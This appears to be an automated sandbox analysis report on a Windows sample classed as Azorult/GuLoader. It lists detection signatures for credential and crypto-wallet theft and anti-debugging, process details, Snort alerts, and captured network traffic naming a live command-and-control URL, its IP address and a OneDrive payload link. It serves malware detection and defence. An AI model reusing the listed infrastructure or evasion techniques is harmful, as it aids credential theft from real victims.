Loading ...

Play interactive tourEdit tour

Analysis Report educry.exe

Overview

General Information

Sample Name:educry.exe
Analysis ID:288088
MD5:ff8d576d2a44ebd419da4cd03cd49ba6
SHA1:31de103753c826ed42883ab98daeeff443f12926
SHA256:3ec257ac5b1594efa6862e7dfa6d4a4ed56f81ffb9e5320ce9dc95baaf9f00e1
Tags:exe

Most interesting Screenshot:

Detection

Azorult GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Potential malicious icon found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Azorult
Yara detected GuLoader
Binary contains a suspicious time stamp
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • educry.exe (PID: 6588 cmdline: 'C:\Users\user\Desktop\educry.exe' MD5: FF8D576D2A44EBD419DA4CD03CD49BA6)
    • educry.exe (PID: 6624 cmdline: 'C:\Users\user\Desktop\educry.exe' MD5: FF8D576D2A44EBD419DA4CD03CD49BA6)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.260334364.000000001E06C000.00000004.00000001.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
    00000001.00000002.263140364.0000000000560000.00000040.00000001.sdmpJoeSecurity_GuLoaderYara detected GuLoaderJoe Security
      Process Memory Space: educry.exe PID: 6624JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
        Process Memory Space: educry.exe PID: 6624JoeSecurity_Azorult_1Yara detected AzorultJoe Security
          Process Memory Space: educry.exe PID: 6624JoeSecurity_GuLoaderYara detected GuLoaderJoe Security
            Click to see the 2 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for domain / URLShow sources
            Source: laninesolution.comVirustotal: Detection: 12%Perma Link
            Source: http://laninesolution.com/roky/PL341/index.phpVirustotal: Detection: 12%Perma Link
            Multi AV Scanner detection for submitted fileShow sources
            Source: educry.exeVirustotal: Detection: 40%Perma Link
            Source: educry.exeReversingLabs: Detection: 22%

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2029467 ET TROJAN Win32/AZORult V3.3 Client Checkin M14 192.168.2.5:49719 -> 202.52.146.102:80
            Source: TrafficSnort IDS: 2029136 ET TROJAN AZORult v3.3 Server Response M1 202.52.146.102:80 -> 192.168.2.5:49719
            Source: Joe Sandbox ViewASN Name: GMEDIA-AS-IDGlobalMediaTeknologiPTID GMEDIA-AS-IDGlobalMediaTeknologiPTID
            Source: global trafficHTTP traffic detected: POST /roky/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: laninesolution.comContent-Length: 107Cache-Control: no-cacheData Raw: 00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 8b 30 60 8b 30 63 8b 30 63 e8 26 66 9e 45 17 8b 31 11 eb 26 66 9f 42 70 9d 3a 70 9d 30 14 8b 30 61 8b 30 60 8b 31 11 8b 30 60 8b 30 60 8b 30 65 8b 30 66 ef 47 13 8b 30 6c Data Ascii: Fp;p50c&fEpGp:p7p2p7p:p3p410b0`0c0c&fE1&fBp:p00a0`10`0`0e0fG0l
            Source: global trafficHTTP traffic detected: POST /roky/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: laninesolution.comContent-Length: 40221Cache-Control: no-cache
            Source: unknownDNS traffic detected: queries for: onedrive.live.com
            Source: unknownHTTP traffic detected: POST /roky/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: laninesolution.comContent-Length: 107Cache-Control: no-cacheData Raw: 00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 8b 30 60 8b 30 63 8b 30 63 e8 26 66 9e 45 17 8b 31 11 eb 26 66 9f 42 70 9d 3a 70 9d 30 14 8b 30 61 8b 30 60 8b 31 11 8b 30 60 8b 30 60 8b 30 65 8b 30 66 ef 47 13 8b 30 6c Data Ascii: Fp;p50c&fEpGp:p7p2p7p:p3p410b0`0c0c&fE1&fBp:p00a0`10`0`0e0fG0l
            Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
            Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: educry.exe, 00000001.00000002.263438456.0000000000882000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
            Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
            Source: educry.exe, 00000001.00000002.263438456.0000000000882000.00000004.00000020.sdmp, educry.exe, 00000001.00000003.262199742.000000001E060000.00000004.00000001.sdmpString found in binary or memory: http://laninesolution.com/roky/PL341/index.php
            Source: educry.exe, 00000001.00000003.254217702.0000000000882000.00000004.00000001.sdmpString found in binary or memory: http://laninesolution.com/roky/PL341/index.php)5
            Source: educry.exe, 00000001.00000002.263438456.0000000000882000.00000004.00000020.sdmpString found in binary or memory: http://laninesolution.com/roky/PL341/index.php5
            Source: educry.exe, 00000001.00000002.263374968.0000000000828000.00000004.00000020.sdmpString found in binary or memory: http://laninesolution.com/roky/PL341/index.php=N
            Source: educry.exe, 00000001.00000002.263438456.0000000000882000.00000004.00000020.sdmpString found in binary or memory: http://laninesolution.com/roky/PL341/index.phpQ
            Source: educry.exe, 00000001.00000002.263374968.0000000000828000.00000004.00000020.sdmpString found in binary or memory: http://laninesolution.com/roky/PL341/index.phpbN
            Source: educry.exe, 00000001.00000002.263374968.0000000000828000.00000004.00000020.sdmpString found in binary or memory: http://laninesolution.com/roky/PL341/index.phpiHN
            Source: educry.exe, 00000001.00000003.254168601.0000000000862000.00000004.00000001.sdmpString found in binary or memory: http://laninesolution.com/roky/PL341/index.phpp4
            Source: educry.exe, 00000001.00000002.263438456.0000000000882000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
            Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0N
            Source: educry.exe, 00000001.00000002.263438456.0000000000882000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.msocsp.com0
            Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://ocsp.thawte.com0
            Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
            Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
            Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
            Source: mozglue.dll.1.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
            Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: http://www.mozilla.com0
            Source: educry.exe, 00000001.00000002.263374968.0000000000828000.00000004.00000020.sdmpString found in binary or memory: https://hqaoiw.bl.file
            Source: educry.exe, 00000001.00000003.254168601.0000000000862000.00000004.00000001.sdmpString found in binary or memory: https://hqaoiw.bl.files.1drv.com/
            Source: educry.exe, 00000001.00000002.263438456.0000000000882000.00000004.00000020.sdmpString found in binary or memory: https://hqaoiw.bl.files.1drv.com/y4mYNBLkSGzFZRmGjrvFEg-nE1CZVR1rqz1N-OXSwX5km0DqN3zeaW9CloQuosMtR3q
            Source: educry.exe, 00000001.00000002.263374968.0000000000828000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/
            Source: educry.exe, 00000001.00000003.254217702.0000000000882000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=4C3F5C65A99DA195&resid=4C3F5C65A99DA195%21164&authkey=ALVVLt1
            Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0

            System Summary:

            barindex
            Potential malicious icon foundShow sources
            Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A020C EnumWindows,NtSetInformationThread,NtWriteVirtualMemory,TerminateProcess,0_2_023A020C
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A384E NtProtectVirtualMemory,0_2_023A384E
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A3BB5 NtResumeThread,0_2_023A3BB5
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A15AC NtWriteVirtualMemory,0_2_023A15AC
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A3C2C NtResumeThread,0_2_023A3C2C
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A3822 NtProtectVirtualMemory,0_2_023A3822
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A0612 NtWriteVirtualMemory,0_2_023A0612
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A185A NtWriteVirtualMemory,0_2_023A185A
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A025E NtSetInformationThread,TerminateProcess,0_2_023A025E
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A02BD NtSetInformationThread,TerminateProcess,0_2_023A02BD
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A168D NtWriteVirtualMemory,0_2_023A168D
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A3C81 NtResumeThread,0_2_023A3C81
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A16F0 NtWriteVirtualMemory,0_2_023A16F0
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A3D95 NtResumeThread,0_2_023A3D95
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_023A3BDD NtResumeThread,0_2_023A3BDD
            Source: C:\Users\user\Desktop\educry.exeCode function: 0_2_004013E40_2_004013E4
            Source: educry.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: api-ms-win-core-errorhandling-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-debug-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-console-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-datetime-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-file-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: educry.exe, 00000000.00000002.198187126.00000000021C0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs educry.exe
            Source: educry.exe, 00000000.00000000.180158436.000000000040B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameknkfriindrawing.exe vs educry.exe
            Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs educry.exe
            Source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs educry.exe
            Source: educry.exe, 00000001.00000003.244888910.000000001EA50000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs educry.exe
            Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs educry.exe
            Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs educry.exe
            Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs educry.exe
            Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs educry.exe
            Source: educry.exe, 00000001.00000003.249458341.000000001F4B0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs educry.exe
            Source: educry.exe, 00000001.00000002.267026698.000000001DEE0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs educry.exe
            Source: educry.exe, 00000001.00000003.245831740.000000001EA34000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs educry.exe
            Source: educry.exe, 00000001.00000000.196866223.000000000040B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameknkfriindrawing.exe vs educry.exe
            Source: educry.exe, 00000001.00000002.266989373.000000001DD90000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs educry.exe
            Source: educry.exeBinary or memory string: OriginalFilenameknkfriindrawing.exe vs educry.exe
            Source: C:\Users\user\Desktop\educry.exeSection loaded: crtdll.dllJump to behavior
            Source: classification engineClassification label: mal100.rans.phis.troj.spyw.evad.winEXE@3/48@3/1
            Source: C:\Users\user\Desktop\educry.exeMutant created: \Sessions\1\BaseNamedObjects\AE86A6D5F-9414907A-7566F0FB-E1A93A45-5503ADF9
            Source: C:\Users\user\Desktop\educry.exeFile created: C:\Users\user\AppData\Local\Temp\DAAF81C1\Jump to behavior
            Source: educry.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\educry.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: C:\Users\user\Desktop\educry.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\educry.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\educry.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\educry.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\educry.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\educry.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\educry.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
            Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
            Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
            Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
            Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
            Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
            Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s;
            Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
            Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
            Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
            Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, nss3.dll.1.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
            Source: educry.exeVirustotal: Detection: 40%
            Source: educry.exeReversingLabs: Detection: 22%
            Source: unknownProcess created: C:\Users\user\Desktop\educry.exe 'C:\Users\user\Desktop\educry.exe'
            Source: unknownProcess created: C:\Users\user\Desktop\educry.exe 'C:\Users\user\Desktop\educry.exe'
            Source: C:\Users\user\Desktop\educry.exeProcess created: C:\Users\user\Desktop\educry.exe 'C:\Users\user\Desktop\educry.exe' Jump to behavior
            Source: C:\Users\user\Desktop\educry.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
            Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: educry.exe, 00000001.00000003.250420215.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: educry.exe, 00000001.00000003.245040275.000000001EA34000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, mozglue.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, nss3.dll.1.dr
            Source: Binary string: ucrtbase.pdb source: educry.exe, 00000001.00000003.249458341.000000001F4B0000.00000004.00000001.sdmp, ucrtbase.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: educry.exe, 00000001.00000003.249689823.000000001F3C0000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.1.dr
            Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: educry.exe, 00000001.00000003.249906228.000000001F3FC000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, freebl3.dll.1.dr
            Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: educry.exe, 00000001.00000003.249689823.000000001F3C0000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: educry.exe, 00000001.00000003.250262723.000000001F424000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: educry.exe, 00000001.00000003.244768131.000000001EA44000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: educry.exe, 00000001.00000003.245040275.000000001EA34000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: educry.exe, 00000001.00000003.249784765.000000001F3DC000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: educry.exe, 00000001.00000003.250262723.000000001F424000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: educry.exe, 00000001.00000003.244494995.000000001EA44000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-1-0.dll.1.dr
            Source: Binary string: vcruntime140.i386.pdbGCTL source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
            Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: educry.exe, 00000001.00000003.250321415.000000001F43C000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, mozglue.dll.1.dr
            Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: educry.exe, 00000001.00000003.244018876.000000001EA34000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: educry.exe, 00000001.00000003.249950826.000000001F400000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: educry.exe, 00000001.00000003.245294172.000000001EA38000.00000004.00000001.sdmp, freebl3.dll.1.dr
            Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: educry.exe, 00000001.00000003.249669828.000000001F3BC000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: educry.exe, 00000001.00000003.250454038.000000001F468000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: educry.exe, 00000001.00000003.244039958.000000001EA44000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: educry.exe, 00000001.00000003.250321415.000000001F43C000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, softokn3.dll.1.dr
            Source: Binary string: msvcp140.i386.pdb source: educry.exe, 00000001.00000003.245831740.000000001EA34000.00000004.00000001.sdmp, msvcp140.dll.1.dr
            Source: Binary string: ucrtbase.pdbUGP source: educry.exe, 00000001.00000003.249458341.000000001F4B0000.00000004.00000001.sdmp, ucrtbase.dll.1.dr
            Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: educry.exe, 00000001.00000003.249950826.000000001F400000.00000004.00000001.sdmp, api-ms-win-core-profile-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: educry.exe, 00000001.00000003.250545208.000000001F4A8000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: educry.exe, 00000001.00000003.250949266.000000001E8B0000.00000004.00000001.sdmp, nssdbm3.dll.1.dr
            Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: educry.exe, 00000001.00000003.249784765.000000001F3DC000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: educry.exe, 00000001.00000003.250262723.000000001F424000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.1.dr
            Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: educry.exe, 00000001.00000003.249950826.000000001F400000.00000004.00000001.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: educry.exe, 00000001.00000003.249689823.000000001F3C0000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: educry.exe, 00000001.00000003.250321415.000000001F43C000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.1.dr
